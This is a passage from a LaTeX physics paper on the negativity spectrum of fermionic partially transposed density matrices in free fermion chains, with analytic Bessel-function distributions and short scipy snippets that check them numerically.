P(|\lambda|) &=\delta(\lambda_M-|\lambda|) + \sqrt{\frac{3}{2}} \frac{b\theta(\lambda_M-|\lambda|)}{|\lambda| \xi} I_1 (\sqrt{6} \xi), \\
n(|\lambda|) &= I_0 (\sqrt{6} \xi),
\label{eq:T_ns_abs}
\end{align}
\end{subequations}
where
\begin{align} \label{eq:xi_ns}
\xi=\sqrt{b\ln|\lambda_M/\lambda|},
\end{align}
and $\lambda_M$ is the largest eigenvalue given by
\begin{align}
\label{eq:lmax_ns_adj}
b=-\ln \lambda_M= -\lim_{n\to \infty} \frac{1}{n}\ln \text{Tr}({\rho^{T_A}} )^n= \frac{1}{3} \ln\ell.
\end{align}
Figure~\ref{fig:rT_spec}(c) shows a good agreement between the analytical formula (\ref{eq:T_ns_abs}) and the numerically obtained spectra for various subsystem sizes. We should note that there is no fitting parameter in (\ref{eq:T_ns_abs}); we only plug in $\lambda_M$ from the numerics.
\iffalse
\begin{align}
P_0(\lambda)& =\delta(\lambda_M-\lambda) + \frac{1}{6} [\frac{\beta_0}{\xi_0} I_1(2\xi_0)+ \frac{2\beta_1}{\xi_1} I_1(2\xi_1) - 2\frac{\beta_2}{\xi_2} J_1(2\xi_2)- \frac{\beta_3}{\xi_3} J_1(2\xi_3)],\\
P_1(\lambda)& = \frac{1}{6} [\frac{\beta_0}{\xi_0} I_1(2\xi_0)+ \frac{\beta_1}{\xi_1} I_1(2\xi_1) + \frac{\beta_2}{\xi_2} J_1(2\xi_2)+ \frac{\beta_3}{\xi_3} J_1(2\xi_3)],\\
P_2(\lambda)& = \frac{1}{6} [\frac{\beta_0}{\xi_0} I_1(2\xi_0)- \frac{\beta_1}{\xi_1} I_1(2\xi_1) + \frac{\beta_2}{\xi_2} J_1(2\xi_2)- \frac{\beta_3}{\xi_3} J_1(2\xi_3)],\\
P_3(\lambda)& = \frac{1}{6} [\frac{\beta_0}{\xi_0} I_1(2\xi_0)-2 \frac{\beta_1}{\xi_1} I_1(2\xi_1) -2 \frac{\beta_2}{\xi_2} J_1(2\xi_2)+ \frac{\beta_3}{\xi_3} J_1(2\xi_3)],
\end{align}
and
\begin{align}
n_0(\lambda)& =\frac{1}{6} [I_0(2\xi_0)+ 2I_0(2\xi_1)
+2J_0(2\xi_2)+ J_0(2\xi_3)], \\
n_1(\lambda)& =\frac{1}{6} [I_0(2\xi_0)+ I_0(2\xi_1)
-J_0(2\xi_2)- J_0(2\xi_3)], \\
n_2(\lambda)& =\frac{1}{6} [I_0(2\xi_0)-I_0(2\xi_1)
-J_0(2\xi_2)+ J_0(2\xi_3)], \\
n_3(\lambda)& =\frac{1}{6} [I_0(2\xi_0)-2I_0(2\xi_1)
+2J_0(2\xi_2) -J_0(2\xi_3)],
\end{align}
\fi
\begin{figure}
\center
\includegraphics[scale=0.6]{adj_branch_2}
\caption{\label{fig:nl_OpOp}
Spectrum of eigenvalues of ${\rho^{T_A}} $ with a certain complex phase (c.f.~Fig.~\ref{fig:rT_spec}(a)) for two equal intervals on an infinite chain.
Solid lines are the prediction in Eq.~\eqref{eq:T_ns_adj}.
Dots are numerics, with different colors corresponding to different subsystem sizes. We use the same numerical procedure as in Fig.~\ref{fig:rT_spec} to obtain the few thousand largest (in modulus) many-body eigenvalues from a truncated set of single-particle eigenvalues.}
\end{figure}
We can further derive the distribution of eigenvalues along the different branches in Fig.~\ref{fig:rT_spec}(a). The idea is to analytically continue ${Z}_{{\cal N}_n}^{({\rm ns})}$ with $n=6N+m$ to arbitrary $n$ and solve the resulting four linearly independent equations generated by (\ref{eq:Zns_spec}) to obtain the moments $\sum_{j} |\lambda_{\alpha j}|^n$ for each $\alpha=0,\cdots,3$. This calculation relies on the assumption that $\lim_{n\to\infty} \frac{c_n}{n}$
does not depend on $m$, which is indeed the case in (\ref{eq:ns_adj_cn}). Hence, we arrive at
\begin{subequations}
\begin{align}
\label{eq:P_ns_adj}
P_\alpha(\lambda)& =\delta(\lambda_M-\lambda)\delta_{\alpha0} + \frac{b \theta(\lambda_M-|\lambda|)}{6|\lambda|\xi} \sum_{\beta=1}^2[M_{\alpha\beta} a_\beta I_1(2a_\beta\xi)- \widetilde M_{\alpha\beta} \tilde a_\beta J_1(2 \tilde a_\beta\xi)],\\
\label{eq:T_ns_adj}
n_\alpha(\lambda)& =\frac{1}{6} \left[ \sum_{\beta=1}^2 M_{\alpha\beta} I_0(2 a_\beta\xi)+ \widetilde M_{\alpha\beta} J_0(2\tilde a_\beta \xi) \right],
\end{align}
\end{subequations}
where $P_\alpha(\lambda)$ and $n_\alpha(\lambda)$, $\alpha=0,\cdots, 3$ describe the distribution of eigenvalues along the $\angle\lambda=\alpha\pi/3$ branch.
Here, $M$ and $\widetilde M$ encapsulate the coefficients
\begin{align}
(M| \widetilde M)=
\left(\begin{array}{cc|cc}
1 & 2 &2 & 1 \\
1 & 1 &-1 & -1 \\
1 & -1 & -1 & 1 \\
1 & -2 & 2 & -1
\end{array}
\right),
\end{align}
$(a_1,a_2, \tilde a_1,\tilde a_2)=(\sqrt{\frac{3}{2}},1 , \frac{1}{\sqrt{2}}, \sqrt{3})$,
\iffalse
\begin{align}
a_1&=\frac{3}{2}b +\frac{1}{6}\ln2,
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \
a_2 = b,
\\
\tilde a_1 &=\frac{1}{2}b +\frac{1}{18}\ln2,
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \
\tilde a_2 =3b +\frac{1}{3} \ln2,
\end{align}
\fi
and $\xi$ and $b$ are defined in Eqs.~(\ref{eq:xi_ns}) and (\ref{eq:lmax_ns_adj}), respectively.
Several comments regarding the phase-resolved distributions (\ref{eq:P_ns_adj}) and (\ref{eq:T_ns_adj}) are in order. The largest eigenvalue $\lambda_M>0$ is located on the real axis and hence only appears in $P_0(\lambda)$. The distribution of the modulus is obtained from the combination $(P_0+2P_1+2P_2+P_3)$, which reproduces (\ref{eq:P_ns_abs}).
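As a cross-check on the coefficient matrices, one can verify numerically that the weighted combination $n_0+2n_1+2n_2+n_3$ of the branch tails (\ref{eq:T_ns_adj}) collapses to the modulus distribution $I_0(\sqrt{6}\,\xi)$ of Eq.~(\ref{eq:T_ns_abs}), i.e., that all $J_0$ contributions cancel. A short sketch using scipy:

```python
import numpy as np
from scipy.special import i0, j0

# Coefficient matrices (M | Mtilde) and arguments as given in the text.
M  = np.array([[1, 2], [1, 1], [1, -1], [1, -2]], dtype=float)
Mt = np.array([[2, 1], [-1, -1], [-1, 1], [2, -1]], dtype=float)
a  = np.array([np.sqrt(1.5), 1.0])            # (a_1, a_2)
at = np.array([1 / np.sqrt(2), np.sqrt(3)])   # (a~_1, a~_2)

def n_branch(alpha, xi):
    """Tail distribution n_alpha as a function of xi, Eq. (eq:T_ns_adj)."""
    xi = np.atleast_1d(xi)
    I = i0(2 * np.outer(xi, a))    # shape (len(xi), 2)
    J = j0(2 * np.outer(xi, at))
    return (I @ M[alpha] + J @ Mt[alpha]) / 6

# Weighted sum over branches (weights 1, 2, 2, 1 for alpha = 0, 1, 2, 3).
xi = np.linspace(0.0, 3.0, 50)
combo = (n_branch(0, xi) + 2 * n_branch(1, xi)
         + 2 * n_branch(2, xi) + n_branch(3, xi))
```

The $I_0(2a_2\xi)$ and both $J_0$ columns drop out of the weighted sum, leaving $I_0(2a_1\xi)=I_0(\sqrt{6}\,\xi)$.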
It is easy to check that the distribution is normalized and consistent with the identity $\text{Tr}{\rho^{T_A}} =1$,
\begin{align}
\label{normalization}
\int \lambda P(\lambda) d\lambda &=
\int \lambda [P_0(\lambda)+P_1(\lambda)-P_2(\lambda)-P_3(\lambda)] d\lambda \nonumber \\
&= \int_0^{\lambda_M} \lambda \left[\delta(\lambda_M-\lambda)+\frac{b}{\lambda \xi} I_1(2\xi)\right] d\lambda =1.
\end{align}
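This normalization can also be verified numerically, as in the following sketch (using scipy, with an illustrative value of $\ell$): after substituting $t=\ln(\lambda_M/\lambda)$, the continuum part of the integral becomes $\lambda_M\int_0^\infty e^{-t}\sqrt{b/t}\,I_1(2\sqrt{bt})\,dt=\lambda_M(e^{b}-1)$, which together with the delta-function piece sums to one.

```python
import numpy as np
from scipy.integrate import quad
from scipy.special import i1

ell = 200.0          # illustrative subsystem length
b = np.log(ell) / 3  # b = -ln(lambda_M) = (1/3) ln(ell)
lam_M = np.exp(-b)

# Continuum piece of int lambda P(lambda) dlambda after t = ln(lambda_M/lambda);
# the integrand is finite at t -> 0, where sqrt(b/t) I_1(2 sqrt(bt)) -> b.
integrand = lambda t: lam_M * np.exp(-t) * np.sqrt(b / t) * i1(2 * np.sqrt(b * t))
cont, _ = quad(integrand, 0, np.inf)

total = lam_M + cont  # delta-function piece + continuum piece
```

The value of $\ell$ is arbitrary here; the sum equals one for any $b>0$.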
It is also possible to study the scaling of the maximum eigenvalue (in modulus) $|\lambda_M|$ along each branch.
For the bosonic negativity, there are only two
branches (positive and negative real axis) and it was found that the scaling
of the maxima is the same in the
thermodynamic limit~\cite{Ruggiero_2}.
In our case, for a given branch (labeled by $\alpha$) the maximum $|\lambda_M^{\alpha}|$ (with $|\lambda^{0}_M| \equiv \lambda_M$) can be extracted as
\begin{equation}
\label{maximum}
\ln |\lambda_{M}^{(\alpha)}| = \lim_{n \to \infty} \frac{1}{n} \ln \sum_{j} |\lambda_j^{(\alpha)}|^n = -b
\end{equation}
where the result is independent of $\alpha$. This again implies the same scaling along each branch, up to a possible unknown constant coming from the non-universal coefficients that we are dropping in the above formulas (see Eq.~\eqref{eq:Rn_cft}).
We compare the analytical results with the numerical simulations for each branch in Fig.~\ref{fig:nl_OpOp}. As expected, the numerical spectra approach the continuum field theory predictions as we make the system larger. We should point out that, in contrast with the bosonic negativity spectrum and the entanglement spectrum, which are given solely in terms of $I_\alpha(x)$, the modified Bessel function of the first kind, the fermionic negativity spectrum contains the Bessel functions $J_\alpha(x)$ as well. Recall that unlike
$I_\alpha(x)$ which is strictly positive for $x>0$, $J_\alpha(x)$ does oscillate between positive and negative values. Nevertheless, there is no issue in $P_\alpha(\lambda)$ which has to be non-negative, as the linear combinations of $I_\alpha$ and $J_\alpha$ in (\ref{eq:T_ns_adj}) are such that they are strictly positive over their range of applicability within each branch.
\subsubsection{Bipartite geometry}
\begin{figure}
\center
\includegraphics[scale=0.7]{bi_branch_2}
\caption{\label{fig:nl_ns_bi}
Spectrum of the modulus of the eigenvalues of ${\rho^{T_A}} $ for the bipartite geometry, along the real and imaginary axes.
The total system size is $L=2\ell$ for each $\ell$.
Solid lines are the prediction in Eq.~\eqref{eq:T_ns_adj2}.
Dots are numerics, with different colors corresponding to different subsystem sizes.
A numerical procedure similar to that of Fig.~\ref{fig:rT_spec} is used to obtain the few thousand largest (in modulus) many-body eigenvalues from a truncated set of single-particle eigenvalues.
}
\end{figure}
Here, we consider two intervals which make up the entire system as shown in the upper panel of Fig.~\ref{fig:Zns_vs_l}(b). In this case, the branch points are identified pairwise as $u_A=v_B$ and $v_A=u_B$, where $\ell_1=v_A-u_A$.
The partition functions in momentum space are found to be
\begin{align}
Z_{k,n}^{(\text{ns})}=\left\{ \begin{array}{lll}
\ell_1^{-8\frac{k^2}{n^2}} & & \left|k/n\right|< 1/4, \\
\ell_1^{-2(2|\frac{k}{n}|-1)^2} & & \left|k/n\right|> 1/4.
\end{array} \right.
\label{eq:Z_NS_bi}
\end{align}
Similar to the adjacent intervals, the discontinuity in the $k$-dependence comes from the $2\pi$ ambiguity of the $U(1)$ monodromy (Appendix~\ref{app:bosonization}). As a result, we have ${\cal N}_n^{({\rm ns})}= c_n \ln (\ell_1)+\cdots $
where
\begin{align}
\label{eq:ns_bi}
c_{n}
=
\left\{
\begin{array}{ll}
-\frac{1}{6} \left( n- \frac{4}{n} \right) &\ \ \ \ \ n=4N, \\
-\frac{1}{6} \left( n- \frac{1}{n} \right) & \ \ \ \ \ n=2N+1, \\
-\frac{1}{6} \left( n+ \frac{8}{n} \right) &\ \ \ \ \ n=4N+2. \
\end{array}
\right.
\end{align}
A benchmark of these expressions against the scaling of RN in numerical simulations is shown in Fig.~\ref{fig:nl_ns_bi}(c).
Because ${\cal N}_n^{({\rm ns})}$ is cyclic in $n$ modulo four, we expect the many-body eigenvalues to lie along the real and imaginary axes. In other words, the complex phases of the eigenvalues are multiples of $2\pi/4$.
We now derive the complex phase structure of many-body eigenvalues from the single particle spectrum.
In the current case, the density matrix is pure, leading to the identity $\gamma^2=\mathbb{I}$ for the covariance matrix.
This property implies that the spectrum of the transformed covariance matrix (\ref{eq:metal_pt}) can be fully determined by the covariance matrix associated to the subsystem A, i.e., $\gamma_{AA}$ in Eq.~(\ref{eq:metal_pt}). Hence, the single particle eigenvalues are given by
\begin{align}
\nu_k= \mu_k + i \sqrt{1-\mu_k^2},
\end{align}
together with the complex conjugates $\nu_k^\ast$, where the $\mu_k$ ($k=0,\cdots, N_A$) denote the eigenvalues of $\gamma_{AA}$~\cite{Eisler2015}. Using (\ref{eq:mb_eigs}), the many-body eigenvalues can be written as
\begin{align}
\lambda_{\boldsymbol{\sigma},\boldsymbol{\sigma'}}= \prod_{\sigma_k=\sigma_k'}
\frac{1+\sigma_k \mu_k}{2}
\prod_{\sigma_k=-\sigma_k'} \frac{\sigma_k i \sqrt{1-\mu_k^2}}{2}.
\end{align}
This decomposition has two types of factors: real positive and pure imaginary.
Therefore, the many-body eigenvalues manifestly lie on the real and imaginary axes.
Moreover, the many-body spectrum contains pairs of purely imaginary eigenvalues $\pm i\lambda_j$. The negative real eigenvalues are also two-fold degenerate, since they are obtained from a product of an even number of purely imaginary factors. In contrast, the real positive eigenvalues are not necessarily degenerate.
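The axis-alignment of the spectrum can be illustrated with a short Python sketch: drawing illustrative eigenvalues $\mu_k$ of $\gamma_{AA}$ at random, the per-mode factors are either real, $(1\pm\mu_k)/2$, or purely imaginary, $\pm i\sqrt{1-\mu_k^2}/2$, so every many-body product lands on the real or imaginary axis, and the purely imaginary eigenvalues come in $\pm i\lambda_j$ pairs.

```python
import itertools
import numpy as np

rng = np.random.default_rng(0)
mu = rng.uniform(-1, 1, size=5)   # illustrative eigenvalues of gamma_AA

def mode_factors(m):
    """Per-mode factors: real (1 +- mu)/2 or purely imaginary +- i sqrt(1-mu^2)/2."""
    s = np.sqrt(1 - m**2)
    return [(1 + m) / 2, (1 - m) / 2, 1j * s / 2, -1j * s / 2]

spectrum = [np.prod(c) for c in itertools.product(*(mode_factors(m) for m in mu))]

# Any product of real and purely imaginary factors is real or purely imaginary.
on_axes = all(l.real == 0 or l.imag == 0 for l in spectrum)

# Flipping the sign of one imaginary factor negates the product exactly,
# so purely imaginary eigenvalues occur in +- pairs.
imag_eigs = [l for l in spectrum if l.real == 0 and l.imag != 0]
paired = all(any(m_ == -l for m_ in spectrum) for l in imag_eigs)
```

Since the four factors of each mode sum to one, the eigenvalues also sum to $\text{Tr}\,{\rho^{T_A}}=1$.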
As a result, the moments of ${\rho^{T_A}} $ now take the following form
\begin{align}
\label{eq:Zns_spec_bi}
{Z}_{{\cal N}_n}^{({\rm ns})} &= \sum_j \lambda_{0j}^n
+2\cos\left(\frac{\pi n}{2}\right) \sum_j |\lambda_{1j}|^n
+ \cos\left(n\pi\right) \sum_j |\lambda_{2j}|^n,
\end{align}
where $\{\lambda_{\alpha j}\}, \alpha=0,1,2$ denote the eigenvalues along $\angle\lambda= \alpha\pi/2$. This expression in turn implies that there are three linearly independent combinations of the branch sums for all $n$, which is again consistent with (\ref{eq:ns_bi}). By analytically continuing the three cases, we derive the moments $\sum_j |\lambda_{\alpha j}|^n$ for each branch. The resulting distributions are found to be
\begin{subequations}
\begin{align}
P_\alpha(\lambda)& =\delta(\lambda_M-\lambda)\delta_{\alpha0} + \frac{ b \theta(\lambda_M-|\lambda|)}{4|\lambda|\xi} \left[ \sum_{\beta=1}^2 M_{\alpha\beta} a_\beta I_1(2a_\beta\xi) - \widetilde M_{\alpha} \tilde a J_1(2 \tilde a\xi) \right],\\
\label{eq:T_ns_adj2}
n_\alpha(\lambda)& =\frac{1}{4} \left[ \sum_{\beta=1}^2 M_{\alpha\beta} I_0(2 a_\beta\xi)+ \widetilde M_{\alpha} J_0(2\tilde a \xi) \right],
\end{align}
\end{subequations}
where $M$ and $\widetilde M$ encode the coefficients
\begin{align}
(M| \widetilde M)=
\left(\begin{array}{cc|c}
1 & 2 & 1 \\
1 & 0 & -1 \\
1 & -2 & 1
\end{array}
\right),
\end{align}
$(a_1, a_2, \tilde{a})= (2, 1, 2 \sqrt{2}) $ and $\xi$ is defined in (\ref{eq:xi_ns}) with $b=-\ln\lambda_M=\frac{1}{6}\ln \ell$. As shown in Fig.~\ref{fig:nl_ns_bi}, the above formulas are in decent agreement with numerical results.
Also in this case the maximum (in modulus) $|\lambda_M^{\alpha}|$ along the different branches can be evaluated through Eq.~\eqref{maximum}, giving (up to an unknown non-universal constant) $\ln |\lambda_M^{\alpha}| = -b$ independent of $\alpha$.
Finally, also for the bipartite geometry, a consistency check is obtained from ${\rm Tr} \rho^{T_A}=1$, which simply follows from a calculation analogous to Eq.~\eqref{normalization}.
\subsection{Spectrum of $\rho^{\widetilde{T}_A}$ }
Again, the first step to find the moments
is the momentum decomposition of (\ref{eq:pTR_R}), yielding
\begin{align}
{Z}_{{\cal N}_n}^{({\rm r})} = \prod_{k=-(n-1)/2}^{(n-1)/2} Z^{(\text{r})}_{k,n},
\end{align}
where the partition function
\begin{align} \label{eq:ZRk_R}
Z^{(\text{r})}_{k,n} = \braket{ {\widetilde{\cal T}}_{k,n} ^{-1}(u_A) {\widetilde{\cal T}}_{k,n} (v_A) {\cal T}_{k,n}(u_B) {\cal T}_{k,n}^{-1} (v_B)}
\end{align}
is subject to modified monodromy conditions for the $ {\widetilde{\cal T}}_{k,n} $ and $ {\widetilde{\cal T}}_{k,n} ^{-1}$, which are $\psi_k\mapsto e^{\pm i(2\pi k/n-\pi)} \psi_k$. This monodromy is different from the supersymmetric trace~\cite{Giveon2016} (see Appendix~\ref{app:susy} for the definition and more details).
\subsubsection{Adjacent intervals}
In this case, we find that
\begin{align}
\label{eq:Z_R_ad}
Z^{(\text{r})}_{k,n}\propto& \ \ell_1^{-2(|\frac{k}{n}|-\frac{1}{2})(|\frac{2k}{n}|-\frac{1}{2})}
\cdot \ell_2^{-2|\frac{k}{n}|(|\frac{2k}{n}|-\frac{1}{2})}
\cdot (\ell_1+\ell_2)^{2|\frac{k}{n}|(|\frac{k}{n}|-\frac{1}{2})}.
\end{align}
It is important to note that for $k<0$ we modified the flux at $u_1$ and $v_1$ by inserting additional $2\pi$ and $-2\pi$ fluxes, respectively, so that the scaling exponent takes its minimum value (c.f.~Appendix~\ref{app:bosonization}).
Summing up the $Z^{(\text{r})}_{k,n}$ terms, we get
\begin{align} \label{eq:R_adjacent}
{\cal N}_n^{({\rm r})}
&= c^{(1)}_n \ln (\ell_1)+ c^{(2)}_n \ln (\ell_2)
+ c^{(3)}_n \ln (\ell_1+\ell_2) + \cdots
\end{align}
where
\begin{align}
c^{(1)}_{n_o} &= -\frac{1}{12} \left( n_o+ \frac{5}{n_o} \right), \\
c^{(2)}_{n_o} =c^{(3)}_{n_o} &= -\frac{1}{12} \left( n_o- \frac{1}{n_o} \right),
\label{eq:cn3_o}
\end{align}
for odd $n=n_o$, and
\begin{align}
c^{(1)}_{n_e}=c^{(2)}_{n_e} & = -\frac{1}{6} \left( \frac{{n_e}}{2}- \frac{2}{{n_e}} \right), \\
c^{(3)}_{n_e} &= -\frac{1}{6} \left( \frac{{n_e}}{2}+ \frac{1}{{n_e}} \right),
\label{eq:cn3_e}
\end{align}
for even $n=n_e$.
As a consistency check, we show in Appendix~\ref{app:moments} that the above formulae can be derived from two disjoint intervals as the distance between the intervals is taken to zero.
Notice that the even $n$ case is identical to the general CFT results~\cite{Calabrese2013}.
Also, from (\ref{eq:anal_cont_f}) we arrive at the familiar result for the logarithmic negativity,
\begin{align} \label{eq:cleanCFT}
{\cal E} = \frac{1}{4} \ln \left( \frac{\ell_1\ell_2}{\ell_1+\ell_2} \right) + \cdots
\end{align}
For equal length intervals, we may write ${\cal N}_n^{({\rm r})}=c_n \ln \ell+ \cdots$ where
\begin{align}
c_{n}
=
\left\{
\begin{array}{ll}
-\frac{1}{4} \left( n_o+ \frac{1}{n_o} \right) & \ \ \ \ \ n=n_o\quad \text{odd}, \\
-\frac{1}{2} \left( \frac{{n_e}}{2}- \frac{1}{{n_e}} \right) &\ \ \ \ \ n=n_e\quad \text{even}. \
\end{array}
\right.
\end{align}
\begin{figure}
\center
\includegraphics[scale=0.7]{adj_pm}
\caption{\label{fig:nl_OpOm}
Tail distribution function for the spectrum of $\rho^{\widetilde{T}_A}$ of two equal adjacent intervals on an infinite chain.
Solid lines are the analytical distributions from Eq.~\eqref{eq:T_tilde_adj}.
Dots are numerics, with different colors corresponding to different subsystem sizes.
We use the same numerical procedure as in Fig.~\ref{fig:rT_spec} to obtain the few thousand largest (in modulus) many-body eigenvalues from a truncated set of single-particle eigenvalues.
}
\end{figure}
As expected for the Hermitian operator $\rho^{\widetilde{T}_A}$, here the moments ${\cal N}_n^{({\rm r})}$ only depend on the parity of $n$, i.e., whether $n$ is odd or even. This means that the eigenvalues are real, either positive or negative. We can also see this from the fact that the single-particle spectrum is real.
The many-body eigenvalues follow the form
$\lambda_{\boldsymbol{\sigma}}= \prod_{\sigma_k=\pm}
(1+\sigma_k \nu_k)/2$,
where $\nu_k$ are single-particle eigenvalues of the covariance matrix (\ref{eq:cov_pTd}).
Following the same procedure as in the previous section, we derive the distribution from the analytic continuation of the moments (in this case there are only two branches). The final result reads
\begin{subequations}
\begin{align}
P(\lambda) &=\delta(\lambda_M-\lambda)+ \frac{b\theta(\lambda_M-|\lambda|)}{2|\lambda|\xi} [- J_1 (2 \xi) \text{sgn}(\lambda)+\sqrt{2} I_1 (2\sqrt{2} \xi) ], \\
\label{eq:T_tilde_adj}
n(\lambda) &= \frac{1}{2} [J_0 (2 \xi) \text{sgn}(\lambda)+I_0 (2\sqrt{2} \xi) ],
\end{align}
\end{subequations}
where $\xi$ takes the same form as in Eq.~(\ref{eq:xi_ns}), now with
$b=-\ln\lambda_M=\frac{1}{4}\ln \ell$.
We present a comparison of the above expression with the numerical spectrum of free fermions on lattices of different lengths in Fig.~\ref{fig:nl_OpOm}. There is good agreement between the analytical and numerical results.
We further find that, as was the case for the bosonic negativity, the scaling of the minimum and maximum eigenvalues is the same.
Finally, we confirm that the probability distribution is properly normalized, such that $\int \lambda P(\lambda) d\lambda=\text{Tr}[\rho(-1)^{F_A}]$, and that it is consistent with $\mathcal{E} = \frac{1}{4}\ln\ell$, Eq.~\eqref{eq:anal_cont_f}, which follows from
\begin{equation}
\mathcal{E} = \ln \int d \lambda \, |\lambda| P (\lambda) = \ln \left[ \lambda_M + \int_{0}^{\lambda_M} d \lambda \, \frac{b \sqrt{2}}{\xi} I_1 (2 \sqrt{2} \xi) \right] =
\frac{1}{4}\ln \ell.
\end{equation}
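This integral is also easy to check numerically, as in the sketch below (with scipy and an illustrative $\ell$): after the substitution $t=\ln(\lambda_M/\lambda)$, the Bessel integral evaluates to $\lambda_M(e^{2b}-1)$, so the bracket equals $\lambda_M e^{2b}=e^{b}=\ell^{1/4}$.

```python
import numpy as np
from scipy.integrate import quad
from scipy.special import i1

ell = 500.0          # illustrative subsystem length
b = np.log(ell) / 4  # b = -ln(lambda_M) = (1/4) ln(ell)
lam_M = np.exp(-b)

# Continuum part of int |lambda| P(lambda) dlambda after t = ln(lambda_M/lambda).
f = lambda t: lam_M * np.exp(-t) * np.sqrt(2 * b / t) * i1(2 * np.sqrt(2 * b * t))
cont, _ = quad(f, 0, np.inf)

E = np.log(lam_M + cont)  # logarithmic negativity, should equal (1/4) ln(ell)
```

The same substitution underlies the normalization checks above; only the coefficient in front of $\xi$ inside the Bessel function changes.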
\subsubsection{Bipartite geometry}
In this case, we start by computing the correlator
\begin{align} \label{eq:b_ZRk_R}
Z^{(\text{r})}_{k,n}
= \braket{ {\cal Q}_{k,n}^{-2}(u_A) {\cal Q}_{k,n}^2(v_A) } \propto \ell_1^{-2(|\frac{2k}{n}|-\frac{1}{2})^2}.
\end{align}
Here again, we have to minimize the scaling exponent for $k<0$ by inserting additional $2\pi$ fluxes (c.f.~Appendix~\ref{app:bosonization}).
The RN is then found to be ${\cal N}_n^{({\rm r})}= c_n \ln (\ell_1) + \cdots$ where
\begin{align}
c_{n}
=
\left\{
\begin{array}{ll}
-\frac{1}{6} \left( n_o+ \frac{2}{n_o} \right) & \ \ \ \ \ n=n_o\quad \text{odd}, \\
-\frac{1}{3} \left( \frac{{n_e}}{2}- \frac{2}{{n_e}} \right) &\ \ \ \ \ n=n_e\quad \text{even}. \
\end{array}
\right.
\end{align}
From this, we derive the distribution of many-body eigenvalues to be
\begin{subequations}
\begin{align}
P(\lambda) &=\delta(\lambda_M-\lambda)+\frac{b\theta(\lambda_M-|\lambda|)}{2|\lambda|\xi} [-\sqrt{2} J_1 (2\sqrt{2} \xi) \text{sgn}(\lambda)+ 2 I_1 (4 \xi) ], \\
n(\lambda) &= \frac{1}{2} [ J_0 (2\sqrt{2} \xi) \text{sgn}(\lambda)+ I_0 (4 \xi) ],
\end{align}
\end{subequations}
where $\xi$ is given in (\ref{eq:xi_ns}) and $b=-\ln\lambda_M=\frac{1}{6}\ln \ell$.
We finish this part with a remark about the covariance matrix.
Using the fact that $\gamma^2=\mathbb{I}$ for pure states, the covariance matrix (\ref{eq:cov_pTd}) can be further simplified into
\begin{align}
\widetilde\gamma =\left( \begin{array}{cc}
\gamma_{AA}-2\gamma_{AA}^{-1} & -i\gamma_{AB} \\
i\gamma_{BA} & \gamma_{BB}
\end{array} \right).
\end{align}
Similar to the adjacent intervals, we can calculate the many-body spectrum from the eigenvalues of the above covariance matrix.
We confirm that the numerical results and analytical expressions match. However, we do not show the plots here, as they look quite similar to Fig.~\ref{fig:nl_OpOm}.
\section{Conclusions}
\label{sec:conclusions}
In summary, we study the distribution of the eigenvalues of partially transposed density matrices, also known as the negativity spectrum, in free fermion chains.
Taking the PT of fermionic density matrices is known to be a difficult task even for free fermions (or Gaussian states). However, recent studies~\cite{Shap_unoriented,Shiozaki_antiunitary,Shap_pTR} suggest that this difficulty could be circumvented by using a different definition of the partial transpose, closely related to the time-reversal transformation. In a matrix representation of a fermionic density matrix, e.g.\ in the Fock space basis, the latter operation involves multiplying by a $\mathbb{Z}_4$ complex phase factor in addition to the matrix transposition, where the phase factor depends solely on the fermion-number parity of the states of the subsystems exchanged in the transposition.
It turns out that the phase factor in the fermionic partial transpose leads to two types of partial transpose operations, ${\rho^{T_A}} $ and $\rho^{\widetilde{T}_A}$.
The difference is that ${\rho^{T_A}} $ is pseudo-Hermitian
and may contain complex eigenvalues, while $\rho^{\widetilde{T}_A}$ is Hermitian and its eigenvalues are real.
This is in contrast with the standard (bosonic) partial transpose, which is always a Hermitian operator and hence has a real spectrum.
In this paper, we presented analytical and numerical results for the negativity spectra using both types of fermionic partial transpose. In the case of $\rho^{\widetilde{T}_A}$, we find that the negativity spectra share many similarities with those found in a previous CFT work~\cite{Ruggiero_2}. However, in the case of ${\rho^{T_A}} $, we find that the eigenvalues form a special pattern in the complex plane and fall on six branches, with phases quantized in units of $2\pi/6$. The spectrum in the latter case is mirror symmetric with respect to the real axis, and there are four universal functions which describe the distributions along the six branches.
The sixfold distribution of eigenvalues is not specific to the complex fermion chain (described by the Dirac Hamiltonian) with $c=1$, and also appears in the critical Majorana chain with $c=1/2$. We further confirmed that our analytical expressions are applicable to the Majorana chain upon modifying the central charge $c$.
Given our free fermion results in one dimension, there are several avenues to pursue for future research.
A natural extension is to explore possible structures in the negativity spectrum of free fermions in higher dimensions.
It would also be interesting to understand the effect of disorder and spin-orbit coupling on this distribution. In particular, the random singlet phase (RSP)~\cite{Refael2004}, which can be realized in the strongly disordered regime of one-dimensional free fermions, is characterized by logarithmic entanglement entropy~\cite{Laflorencie2005,Fagotti2011,Ruggiero_1}, a hallmark of $(1+1)$d critical theories. An interesting question is how the negativity spectrum of the critical RSP differs from the clean limit studied in this paper. Another direction could be studying strongly correlated fermion systems, and especially interacting systems which have a description in terms of projected free fermions, such as the Haldane-Shastry spin chain~\cite{HS-Haldane,HS-Shastry}. Furthermore, it is worth investigating how thermal fluctuations affect the negativity spectrum in finite-temperature states. Finally, the negativity spectrum may be useful in studying quench dynamics and shed light on thermalization.
\section*{Acknowledgments}
The authors would like to acknowledge insightful discussions with Erik Tonni, David Huse, and Zoltan Zimboras.
\paragraph{Funding information}
SR and HS were supported in part by the National Science Foundation under Grant No.\ DMR-1455296,
and under Grant No.\ NSF PHY-1748958.
PC and PR acknowledge support from ERC under Consolidator grant number 771536 (NEMO).
We all thank the Galileo Galilei Institute for Theoretical Physics for the hospitality and the INFN for partial support during the completion of this work.
H.S. acknowledges the support from the ACRI fellowship (Italy) and the KITP graduate fellowship program.
SR is supported by a Simons Investigator Grant from the Simons Foundation.
\begin{appendix}
\section{\label{app:bosonization} Twist fields, bosonization, etc.}
The R\'enyi entanglement entropy (REE) of a reduced density matrix $\rho$ is defined in Eq.~(\ref{eq:Rn_def}).
For non-interacting systems with conserved $U(1)$ charge, we can transform the trace formulas into a product of $n$ decoupled partition functions.
Let us first illustrate this idea for the REE~\cite{Casini2005}. We can diagonalize the twist matrix $T$ in Eq.~(\ref{eq:Tmat}) and rewrite the REE in terms of $n$ decoupled copies,
\begin{align}
